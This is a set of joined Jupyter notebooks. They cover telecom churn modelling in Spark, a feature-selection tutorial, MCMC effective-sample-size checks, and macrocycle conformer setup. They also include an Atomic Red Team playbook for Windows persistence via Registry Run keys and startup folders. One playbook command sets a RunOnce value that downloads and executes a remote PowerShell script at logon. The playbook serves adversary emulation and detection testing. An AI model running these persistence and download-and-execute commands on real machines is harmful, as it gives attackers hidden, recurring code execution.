data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("LOCAL", data_joined_callnotes_churn_campaign["LOCAL"].cast(DecimalType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("DROPPED", data_joined_callnotes_churn_campaign["DROPPED"].cast(IntegerType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("USAGE", data_joined_callnotes_churn_campaign["USAGE"].cast(DecimalType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("RATEPLAN", data_joined_callnotes_churn_campaign["RATEPLAN"].cast(IntegerType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("SMSCOUNT", data_joined_callnotes_churn_campaign["SMSCOUNT"].cast(IntegerType()))
data_joined_callnotes_churn_campaign.show(10)
data_joined_callnotes_churn_campaign.printSchema()
pandas_df_callnotes_campaign_churn = data_joined_callnotes_churn_campaign.toPandas()
pandas_df_callnotes_campaign_churn.head(12)
###Output
+----------+-----------------+----------------+----+------+--------+------+------------+---+-------------+-------+------------+-------------+-----+-------+---------+-------------+--------------------+-----+--------+-----------+-----+------------------+----+--------+
| SENTIMENT|KEYWORD_COMPONENT| KEYWORD_QUERY| ID|GENDER|CHILDREN|INCOME|CAROWNERSHIP|AGE|MARITALSTATUS|ZIPCODE|LONGDISTANCE|INTERNATIONAL|LOCAL|DROPPED|PAYMETHOD|LOCALBILLTYPE|LONGDISTANCEBILLTYPE|USAGE|RATEPLAN|DEVICEOWNED|CHURN|RESPONDED_CAMPAIGN|OMPN|SMSCOUNT|
+----------+-----------------+----------------+----+------+--------+------+------------+---+-------------+-------+------------+-------------+-----+-------+---------+-------------+--------------------+-----+--------+-----------+-----+------------------+----+--------+
| | help| support| 148| M| 2| 91272| Y| 25| Married| null| 27| 0| 13| 0| CC| FreeLocal| Standard| 40| 3| ipho| F| Android Phone| N| 1900|
| | update records| address| 463| M| 0| 69168| Y| 62| Married| null| 14| 6| 215| 0| CC| Budget| Standard| 235| 2| sam| T| Dual SIM| Y| 1586|
|analytical| billing| charges| 471| M| 2| 90104| N| 34| Married| null| 12| 8| 45| 0| CC| Budget| Intnl_discount| 66| 3| sam| F| More Storage| N| 1114|
| satisfied| battery|unpredictability|1238| F| 2| 3194| N| 54| Married| null| 4| 0| 115| 1| CH| Budget| Standard| 119| 3| ipho| F| Large Display| N| 1697|
|frustrated| charger| switch carrier|1342| M| 0| 94928| N| 40| Single| null| 14| 5| 74| 0| CC| FreeLocal| Standard| 94| 1| ipho| T| Dual SIM| Y| 1540|
|analytical| new number| customer care|1591| F| 0| 45613| N| 14| Single| null| 13| 0| 311| 0| CC| Budget| Standard| 324| 4| ipho| F| Android Phone| N| 1681|
|frustrated| call forwarding| features|1645| M| 1| 92648| N| 56| Single| null| 16| 5| 10| 0| CC| Budget| Standard| 32| 4| ipho| T| Android Phone| N| 2291|
|analytical| tablet| new offering|1959| F| 1| 13829| N| 19| Married| null| 42| 0| 160| 0| CC| FreeLocal| Standard| 177| 2| ipho| T| Android Phone| N| 1821|
|analytical| rate plan| customer care|1959| F| 1| 13829| N| 19| Married| null| 42| 0| 160| 0| CC| FreeLocal| Standard| 177| 2| ipho| T| Android Phone| N| 1821|
| | new number| service|2122| M| 2| 49911| Y| 51| Married| null| 27| 0| 24| 0| CC| Budget| Standard| 51| 1| ipho| F| Android Phone| N| 1487|
+----------+-----------------+----------------+----+------+--------+------+------------+---+-------------+-------+------------+-------------+-----+-------+---------+-------------+--------------------+-----+--------+-----------+-----+------------------+----+--------+
only showing top 10 rows
root
|-- SENTIMENT: string (nullable = false)
|-- KEYWORD_COMPONENT: string (nullable = false)
|-- KEYWORD_QUERY: string (nullable = false)
|-- ID: integer (nullable = true)
|-- GENDER: string (nullable = true)
|-- CHILDREN: integer (nullable = true)
|-- INCOME: decimal(10,0) (nullable = true)
|-- CAROWNERSHIP: string (nullable = true)
|-- AGE: integer (nullable = true)
|-- MARITALSTATUS: string (nullable = true)
|-- ZIPCODE: integer (nullable = true)
|-- LONGDISTANCE: decimal(10,0) (nullable = true)
|-- INTERNATIONAL: decimal(10,0) (nullable = true)
|-- LOCAL: decimal(10,0) (nullable = true)
|-- DROPPED: integer (nullable = true)
|-- PAYMETHOD: string (nullable = true)
|-- LOCALBILLTYPE: string (nullable = true)
|-- LONGDISTANCEBILLTYPE: string (nullable = true)
|-- USAGE: decimal(10,0) (nullable = true)
|-- RATEPLAN: integer (nullable = true)
|-- DEVICEOWNED: string (nullable = true)
|-- CHURN: string (nullable = true)
|-- RESPONDED_CAMPAIGN: string (nullable = true)
|-- OMPN: string (nullable = true)
|-- SMSCOUNT: integer (nullable = true)
###Markdown
The following brunel based visualization can also be performed from Data Refinery. Shown here to get the feel for APIs
###Code
%brunel data('pandas_df_callnotes_campaign_churn') bar y(#count) stack polar color(Sentiment) sort(#count) label(Sentiment, ' (', #count, '%)') tooltip(#all) percent(#count) legends(none)
%brunel data('pandas_df_callnotes_campaign_churn') bar x(Sentiment) y(#count) sort(#count) tooltip(#all)
%brunel data('pandas_df_callnotes_campaign_churn') treemap x(Keyword_Component) color(Keyword_Component) size(#count) label(Keyword_Query) tooltip(#all)
###Output
_____no_output_____
###Markdown
The following cell shows an example of how pixiedust can be used to build interactive dashboards, and how it can be exported out
###Code
#display(pandas_df_callnotes_campaign_churn)
display(data_joined_callnotes_churn_campaign)
###Output
_____no_output_____
###Markdown
Building RandomForest based classifier
###Code
si_gender = StringIndexer(inputCol='GENDER', outputCol='GenderIndexed',handleInvalid='error')
si_status = StringIndexer(inputCol='MARITALSTATUS',outputCol='MaritalStatusIndexed',handleInvalid='error')
si_carownership = StringIndexer(inputCol='CAROWNERSHIP',outputCol='CarOwnershipIndexed',handleInvalid='error')
#si_paymentmode = StringIndexer(inputCol='Paymethod',outputCol='PaymethodIndexed',handleInvalid='error')
si_localbill = StringIndexer(inputCol='LOCALBILLTYPE',outputCol='LocalBilltypeIndexed',handleInvalid='error')
si_longdistancebill = StringIndexer(inputCol='LONGDISTANCEBILLTYPE',outputCol='LongDistanceBilltypeIndexed',handleInvalid='error')
si_sentiment = StringIndexer(inputCol='SENTIMENT',outputCol='SentimentIndexed',handleInvalid='error')
si_multiplelines = StringIndexer(inputCol='OMPN',outputCol='OMPNIndexed',handleInvalid='error')
si_churnLabel = StringIndexer(inputCol='CHURN', outputCol='label',handleInvalid='error')
churnLabelIndexer = si_churnLabel.fit(data_joined_callnotes_churn_campaign)
#Apply OneHotEncoder so categorical features aren't given numeric importance
ohe_gender = OneHotEncoder(inputCol="GenderIndexed", outputCol="GenderIndexed"+"classVec")
ohe_maritalstatus = OneHotEncoder(inputCol="MaritalStatusIndexed", outputCol="MaritalStatusIndexed"+"classVec")
ohe_carownership = OneHotEncoder(inputCol="CarOwnershipIndexed", outputCol="CarOwnershipIndexed"+"classVec")
#ohe_paymentmode = OneHotEncoder(inputCol="PaymethodIndexed", outputCol="PaymethodIndexed"+"classVec")
ohe_localbill = OneHotEncoder(inputCol="LocalBilltypeIndexed", outputCol="LocalBilltypeIndexed"+"classVec")
ohe_longdistance = OneHotEncoder(inputCol="LongDistanceBilltypeIndexed", outputCol="LongDistanceBilltypeIndexed"+"classVec")
ohe_sentiment = OneHotEncoder(inputCol='SentimentIndexed', outputCol='SentimentIndexed'+'classVec')
ohe_multiplelines = OneHotEncoder(inputCol='OMPNIndexed', outputCol='OMPNIndexed'+'classVec')
assembler = VectorAssembler(inputCols=["GenderIndexedclassVec", "MaritalStatusIndexedclassVec", "CarOwnershipIndexedclassVec", "LocalBilltypeIndexedclassVec", \
"LongDistanceBilltypeIndexedclassVec","SentimentIndexedclassVec","OMPNIndexedclassVec","CHILDREN", "INCOME", "AGE", \
"LONGDISTANCE", "INTERNATIONAL", "LOCAL", "DROPPED","SMSCOUNT"], outputCol="features")
randomforest_classifier=RandomForestClassifier(labelCol="label", featuresCol="features")
# Convert indexed labels back to original labels.
labelConverter = IndexToString(inputCol="prediction", outputCol="predictedLabel", labels=churnLabelIndexer.labels)
pipeline = Pipeline(stages=[si_gender,si_status,si_carownership,si_localbill,si_longdistancebill,si_sentiment,si_multiplelines,churnLabelIndexer, ohe_gender,ohe_maritalstatus,ohe_carownership,ohe_localbill,ohe_longdistance,ohe_sentiment,ohe_multiplelines, assembler, randomforest_classifier, labelConverter])
###Output
_____no_output_____
###Markdown
Split the dataset into training and test using 70:30 split ratio and build the model
###Code
train, test = data_joined_callnotes_churn_campaign.randomSplit([0.7,0.3], seed=7)
train.cache()
test.cache()
model = pipeline.fit(train)
###Output
_____no_output_____
###Markdown
Testing the model on the held-out test dataset
###Code
results = model.transform(test)
results=results.select(results["ID"],results["CHURN"],results["label"],results["predictedLabel"],results["prediction"],results["probability"])
results.toPandas().head(6)
###Output
_____no_output_____
###Markdown
Model Evaluation
###Code
prefix_precision = 'Precision model1 = {:.2f}.'
print (prefix_precision.format(results.filter(results.label == results.prediction).count() / float(results.count())))
prefix_aoc = 'Area under ROC curve = {:.2f}.'
evaluator = BinaryClassificationEvaluator(rawPredictionCol="prediction", labelCol="label", metricName="areaUnderROC")
print (prefix_aoc.format(evaluator.evaluate(results)))
from repository.mlrepositoryclient import MLRepositoryClient
from repository.mlrepositoryartifact import MLRepositoryArtifact
service_path = 'https://internal-nginx-svc.ibm-private-cloud.svc.cluster.local:12443'
ml_repository_client = MLRepositoryClient()
model_artifact = MLRepositoryArtifact(model, training_data=train, name="Customer Churn Prediction - db2")
# Add author information for model
model_artifact.meta.add("authorName", "Data Scientist");
###Output
_____no_output_____
###Markdown
Save pipeline and model artifacts to Machine Learning repository:
###Code
saved_model = ml_repository_client.models.save(model_artifact)
# Print the saved model properties
print "modelType: " + saved_model.meta.prop("modelType")
print "creationTime: " + str(saved_model.meta.prop("creationTime"))
print "modelVersionHref: " + saved_model.meta.prop("modelVersionHref")
print "label: " + saved_model.meta.prop("label")
###Output
modelType: sparkml-model-2.0
creationTime: 2018-02-19 22:18:53.157000+00:00
modelVersionHref: https://internal-nginx-svc.ibm-private-cloud.svc.cluster.local:12443/v2/artifacts/models/56af74d4-93f4-41bd-8069-850a5117475d/versions/4de851a3-4d05-4957-a27f-6701418e6ce4
label: CHURN
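###Markdown
A quick sanity check that the fitted pipeline can score new rows (this sketch reuses the in-memory model rather than retrieving the saved artifact, to avoid assuming any repository retrieval API):
###Code
scored = model.transform(test.limit(5))
scored.select("ID", "predictedLabel", "probability").show()
###Output
_____no_output_____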
20200624 JBL featureSel tutorial.ipynb | ###Markdown
Feature selection with categorical data, following https://machinelearningmastery.com/feature-selection-with-categorical-data/ Prepare data for Ordinal Encoder
###Code
from pandas import read_csv
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OrdinalEncoder
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
from sklearn.feature_selection import mutual_info_classif
from matplotlib import pyplot
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
filename = "breast-cancer.csv"
# load the dataset as a pandas DataFrame
data = read_csv(filename, header=None)
# retrieve numpy array
dataset = data.values
# split into input (X) and output (y) variables
X = dataset[:, :-1]
y = dataset[:,-1]
# format all fields as string
X = X.astype(str)
# load the dataset
def load_dataset(filename):
# load the dataset as a pandas DataFrame
data = read_csv(filename, header=None)
# retrieve numpy array
dataset = data.values
# split into input (X) and output (y) variables
X = dataset[:, :-1]
y = dataset[:,-1]
# format all fields as string
X = X.astype(str)
return X, y
# load the dataset
X, y = load_dataset(filename)
# split into train and test sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=1)
# summarise
print('Train', X_train.shape, y_train.shape)
print('Test', X_test.shape, y_test.shape)
# prepare input data
def prepare_inputs(X_train, X_test):
oe = OrdinalEncoder()
oe.fit(X_train)
X_train_enc = oe.transform(X_train)
X_test_enc = oe.transform(X_test)
return X_train_enc, X_test_enc
# prepare target - could be done with OrdinalEncoder, but LabelEncoder is designed for a single variable
def prepare_targets(y_train, y_test):
le = LabelEncoder()
le.fit(y_train)
y_train_enc = le.transform(y_train)
y_test_enc = le.transform(y_test)
return y_train_enc, y_test_enc
# prepare input data
X_train_enc, X_test_enc = prepare_inputs(X_train, X_test)
# prepare output data
y_train_enc, y_test_enc = prepare_targets(y_train,y_test)
# https://stackoverflow.com/questions/12926898/numpy-unique-without-sort
# eyeball input categories
np.unique(X_train)
###Output
_____no_output_____
###Markdown
Chi-Squared Feature Selection
###Code
# custom function for feature selection
def select_features(X_train, y_train, X_test):
fs = SelectKBest(score_func=chi2, k='all')
fs.fit(X_train, y_train)
X_train_fs = fs.transform(X_train)
X_test_fs = fs.transform(X_test)
return X_train_fs, X_test_fs, fs
# feature selection
X_train_fs, X_test_fs, fs=select_features(X_train_enc, y_train_enc, X_test_enc)
# what are scores for the features
for i in range(len(fs.scores_)):
print('Feature %d: %f' % (i, fs.scores_[i]))
# plot the scores
pyplot.bar([i for i in range(len(fs.scores_))], fs.scores_)
pyplot.show()
###Output
_____no_output_____
###Markdown
The bar chart indicates that features 3, 4, 5, and 8 are most relevant. We could set k=4 when configuring the SelectKBest to select these top four features. In a new branch of this Github, update the Ordinal Encoding example to try specifying the order for those variables that have a natural ordering and see if it has an impact on model performance. Build model with all featuresLogistic regression is a good model for testing feature selection methods as it can perform better if irrelevant features are removed from the model.
###Code
# fit the model
model = LogisticRegression(solver='lbfgs')
model.fit(X_train_enc, y_train_enc)
# evaluate the model
yhat = model.predict(X_test_enc)
# evaluate predictions
accuracy = accuracy_score(y_test_enc, yhat)
print('Accuracy: %.2f' % (accuracy*100))
###Output
_____no_output_____
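###Markdown
As a sketch of the k=4 idea discussed earlier, the same pipeline restricted to the top four chi-squared features (all names below are new, illustrative variables):
###Code
fs4 = SelectKBest(score_func=chi2, k=4)
fs4.fit(X_train_enc, y_train_enc)
model4 = LogisticRegression(solver='lbfgs')
model4.fit(fs4.transform(X_train_enc), y_train_enc)
yhat4 = model4.predict(fs4.transform(X_test_enc))
print('Accuracy with top-4 features: %.2f' % (accuracy_score(y_test_enc, yhat4) * 100))
###Output
_____no_output_____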
playbook/tactics/privilege-escalation/T1547.001.ipynb | ###Markdown
T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderAdversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.The following run keys are created by default on Windows systems:* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceThe HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)The following Registry keys can be used to set startup folder items for persistence:* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersThe following Registry keys can control automatic startup of services during boot:* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. 
The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. Atomic Tests
###Code
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 -Force
###Output
_____no_output_____
###Markdown
Atomic Test 1 - Reg Key RunRun Key PersistenceUpon successful execution, cmd.exe will modify the registry by adding \"Atomic Red Team\" to the Run key. Output will be via stdout. **Supported Platforms:** windows Attack Commands: Run with `command_prompt````command_promptREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"```
###Code
Invoke-AtomicTest T1547.001 -TestNumbers 1
###Output
_____no_output_____
###Markdown
Atomic Test 2 - Reg Key RunOnceRunOnce Key Persistence.Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. **Supported Platforms:** windows Attack Commands: Run with `command_prompt````command_promptREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll"```
###Code
Invoke-AtomicTest T1547.001 -TestNumbers 2
###Output
_____no_output_____
###Markdown
Atomic Test 3 - PowerShell Registry RunOnceRunOnce Key Persistence via PowerShellUpon successful execution, a new entry will be added to the runonce item in the registry.**Supported Platforms:** windowsElevation Required (e.g. root or admin) Attack Commands: Run with `powershell````powershell$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'```
###Code
Invoke-AtomicTest T1547.001 -TestNumbers 3
###Output
_____no_output_____
###Markdown
Atomic Test 4 - Suspicious vbs file run from startup Foldervbs files can be placed in and run from the startup folder to maintain persistence. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in.**Supported Platforms:** windowsElevation Required (e.g. root or admin) Attack Commands: Run with `powershell````powershellCopy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"```
###Code
Invoke-AtomicTest T1547.001 -TestNumbers 4
###Output
_____no_output_____
###Markdown
Atomic Test 5 - Suspicious jse file run from startup folder

jse files can be placed in and run from the startup folder to maintain persistence. Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)

Attack Commands: Run with `powershell`

```powershell
Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
```
###Code
Invoke-AtomicTest T1547.001 -TestNumbers 5
###Output
_____no_output_____
###Markdown
Atomic Test 6 - Suspicious bat file run from startup folder

bat files can be placed in and executed from the startup folder to maintain persistence. Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)

Attack Commands: Run with `powershell`

```powershell
Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
```
###Code
Invoke-AtomicTest T1547.001 -TestNumbers 6
###Output
_____no_output_____ |
emcee_autocorrelation/emcee_ess_calibration_posterior.ipynb | ###Markdown
Model

The model on which to perform the simulation will be the estimation of the mean of a Normal variable having observed y = 0. We will use:

$$ p(\theta) = \mathcal{N}(0, 10)\\p(y|\theta) = \mathcal{N}(\theta, 2)\\p(\theta|y) \propto p(y|\theta)p(\theta) \propto \exp\left(-\frac{(y-\theta)^2}{8}\right)\exp\left(-\frac{\theta^2}{200}\right)\\p(\theta|0) \propto \exp\left(-\frac{\theta^2}{8}\right)\exp\left(-\frac{\theta^2}{200}\right) = \exp\left(-\frac{\theta^2}{200/26}\right)$$

Therefore, our posterior can be calculated analytically, and it turns out to be $\mathcal{N}(0, \frac{10}{\sqrt{26}})$, whose pdf is:

$$ p(\theta|0) = \frac{1}{\sqrt{2\pi}\,\frac{10}{\sqrt{26}}} \exp\left(-\frac{13\theta^2}{100}\right)$$
###Code
sigma2 = 100/26  # analytic posterior variance (sd = 10/sqrt(26))
###Output
_____no_output_____
###Markdown
Utils
###Code
def ess_evolution(samples):
chains, draws = samples.shape
idxs = np.unique(np.geomspace(5, draws, 500, dtype=int))
ess_samples = np.empty(idxs.size)
for i, idx in enumerate(idxs):
ess_samples[i] = az.ess(samples[:, :idx], method="mean")
return idxs, ess_samples
def plot_ess_evolution(samples, idxs, ess_samples, title="", variance=sigma2):
    chains, draws = samples.shape
    # squared error of the running posterior-mean estimate (the true mean is 0);
    # divide the cumulative sum by the number of samples seen so far
    running_mean = samples.sum(axis=0).cumsum() / (np.arange(1, draws + 1) * chains)
    plt.loglog(running_mean ** 2, label="var_err");
    plt.loglog(idxs, variance/ess_samples, label="var/ess");
    plt.legend(loc="lower left");
    plt.title(title);
    plt.axis(ymin=1e-8);
###Output
_____no_output_____
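###Markdown
Before comparing the samplers, a quick sanity check of the relation these utilities visualize: the squared error of a posterior-mean estimate should track var/ESS, and for independent draws the ESS is close to the total number of draws. A minimal sketch on iid draws from the analytic posterior (it reuses `sigma2` defined above and the `np`/`az` imports of this notebook):
###Code
rng = np.random.default_rng(0)
chains, draws = 4, 10000
iid = rng.normal(0.0, np.sqrt(sigma2), size=(chains, draws))  # iid draws, so ESS ~ chains*draws

ess = float(az.ess(iid, method="mean"))
print("ESS:", ess, "of", chains * draws, "draws")
print("var/ESS:", sigma2 / ess)
print("squared error of the mean:", iid.mean() ** 2)
###Output
_____no_output_____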
###Markdown
PyMC3
###Code
with pm.Model() as model:
theta = pm.Normal("theta", mu=0, sigma=10)
y = pm.Normal("y", mu=theta, sigma=2, observed=0)
trace = pm.sample(draws=700000, chains=4, tune=300000)
idata_pymc3 = az.from_pymc3(trace)
idata_pymc3.to_netcdf("pymc3_post_autocorr.nc")
idata_pymc3 = az.from_netcdf("pymc3_post_autocorr.nc")
###Output
_____no_output_____
###Markdown
Chain average
###Code
idxs, ess_samples = ess_evolution(idata_pymc3.posterior.theta.values)
plot_ess_evolution(idata_pymc3.posterior.theta.values, idxs, ess_samples, title="PyMC3")
###Output
_____no_output_____
###Markdown
PyStan
###Code
stan_code = """
data {
real y;
}
parameters {
real theta;
}
model {
theta ~ normal(0, 10);
y ~ normal(theta, 2);
}
"""
stan_model = pystan.StanModel(model_code=stan_code)
fit = stan_model.sampling(data={"y": 0}, chains=4, iter=10**6, warmup=300000)
idata_pystan = az.from_pystan(fit)
idata_pystan.to_netcdf("pystan_post_autocorr.nc")
idata_pystan = az.from_netcdf("pystan_post_autocorr.nc")
###Output
_____no_output_____
###Markdown
Chain average
###Code
idxs, ess_samples = ess_evolution(idata_pystan.posterior.theta.values)
plot_ess_evolution(idata_pystan.posterior.theta.values, idxs, ess_samples, title="PyStan")
###Output
_____no_output_____
###Markdown
emcee
###Code
def lnprob(theta):
    # log of the analytic posterior N(0, 100/26), up to an additive constant
    return -13 * theta**2 / 100
nwalkers = 6
ndim = 1
draws = 701000  # 1000 extra draws, discarded below as burn-in
pos = np.random.normal(size=(nwalkers, ndim))
sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob)
sampler.run_mcmc(pos, draws, progress=True);
idata_emcee = az.from_emcee(sampler, var_names=["theta"])
idata_emcee = idata_emcee.sel(draw=slice(1000, None))  # drop the first 1000 draws as burn-in
idata_emcee.to_netcdf("emcee_post_autocorr.nc")
idata_emcee = az.from_netcdf("emcee_post_autocorr.nc")
###Output
_____no_output_____
###Markdown
Chain average
###Code
idxs, ess_samples = ess_evolution(idata_emcee.posterior.theta.values)
plot_ess_evolution(idata_emcee.posterior.theta.values, idxs, ess_samples, title="emcee")
###Output
_____no_output_____
###Markdown
Check all samplers got the same posterior
###Code
az.plot_density([idata_emcee, idata_pystan, idata_pymc3])
###Output
_____no_output_____ |
conformers_m13.ipynb | ###Markdown
Exploring conformational space of selected macrocycles - "M13"; Part 1: Generation and selection of conformer candidates (MM methods)
###Code
from IPython.display import HTML
HTML('''<script>
code_show=true;
function code_toggle() {
if (code_show){
$('div.input').hide();
} else {
$('div.input').show();
}
code_show = !code_show
}
$( document ).ready(code_toggle);
</script>
<form action="javascript:code_toggle()"><input type="submit" value="Click here to toggle on/off the raw code."></form>''')
import glob
import py3Dmol
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
%matplotlib inline
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit.Chem import Draw
from rdkit.Chem import rdMolAlign
from rdkit.Chem.Draw import IPythonConsole
from rdkit import rdBase
print(rdBase.rdkitVersion)
import os,time
print( time.asctime())
# Functions used in this notebook:
def grep_energies_from_sdf_outputs(files):
    """Collect the energy written on the line following the "M END" record of each SDF file."""
    energies = {}
    for inp in files:
        with open(inp,'r') as f:
            lines = f.readlines()
            for i, line in enumerate(lines):
                # note: standard SDF files terminate the atom block with "M  END" (two spaces);
                # the single-space pattern below assumes the files used here are written that way
                if "M END" in line:
                    energies[os.path.splitext(os.path.basename(inp))[0]] = float(lines[i+1])
    return energies
def write_to_dict(prefix, suppl):
moldict = {}
for i, mol in enumerate(suppl):
name = prefix + str(i)
moldict[name] = mol
return moldict
def align_structures_to_crystal(moldict):
for key, mol in moldict.items():
core_mol = mol.GetSubstructMatch(Chem.MolFromSmiles(core_smiles))
AllChem.AlignMol(mol,m13_crystal,atomMap=list(zip(core_mol,core_m13)))
def align_structures_to_lowest_energy(moldict, energy_dict):
"""
align all structures in "moldict" to the one of the lowest energy
"""
energy_sorted = sorted(energy_dict.items(), key=lambda x: x[1])
first = energy_sorted[0][0]
core_first = moldict[first].GetSubstructMatch(Chem.MolFromSmiles(core_smiles))
for key, mol in moldict.items():
core_mol = mol.GetSubstructMatch(Chem.MolFromSmiles(core_smiles))
AllChem.AlignMol(mol,moldict[first],atomMap=list(zip(core_mol,core_first)))
def prepare_view(moldict):
p = py3Dmol.view(width=400,height=400)
for key, mol in moldict.items():
mb = Chem.MolToMolBlock(mol)
p.addModel(mb,'sdf')
p.setStyle({'stick':{'radius':'0.15'}})
p.setBackgroundColor('0xeeeeee')
p.zoomTo()
return p
def make_similarity_matrix(moldict):
